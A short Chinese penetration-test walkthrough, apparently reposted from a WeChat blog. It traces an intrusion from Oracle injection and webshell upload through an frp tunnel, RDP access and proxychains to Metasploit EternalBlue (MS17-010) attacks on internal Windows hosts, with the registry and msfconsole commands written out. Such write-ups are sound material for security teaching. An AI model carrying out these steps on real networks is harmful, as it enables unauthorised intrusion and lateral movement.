一、通过上传直接拿到webshell
前台通过oracle注入进入拿到后台管理员密码,然后进入后台直接上传拿到webshell。通过天蝎上传frp,成功搭建内网隧道。
0x01 连接天蝎
0x02 查看3389端口
REG query "HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber
set /a Port=0x8f1
0x03 搭建FRP
二、使用远程桌面登录
0x01 配置proxifier
(1):设置代理服务器
(2):配置proxifier
0x02 使用远程桌面进行登录
登录成功。
0x03 使用工具进行扫描
发现5台主机存在ms17_010漏洞。
0x04 配置proxychains
vi /etc/proxychains.conf
0x05 使用proxychains代理msf进行利用
proxychains4 msfconsole
三、使用永恒之蓝进行利用
0x01 使用MSF获取win2008shell
(1):寻找payload
search ms17-010
use 2
options
(2):设置目标主机
set rhost 192.168.0.104
(3):进行攻击
run
0x02 使用MSF获取win7shell
(1):设置目标IP
set rhost 192.168.10.38
(2):进行攻击
run
https://mp.weixin.qq.com/s/ck46QIT1uixEhNqdv1t25Q
原文始发于微信公众号(想走安全的小白):记一次内网ms_17-010的使用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论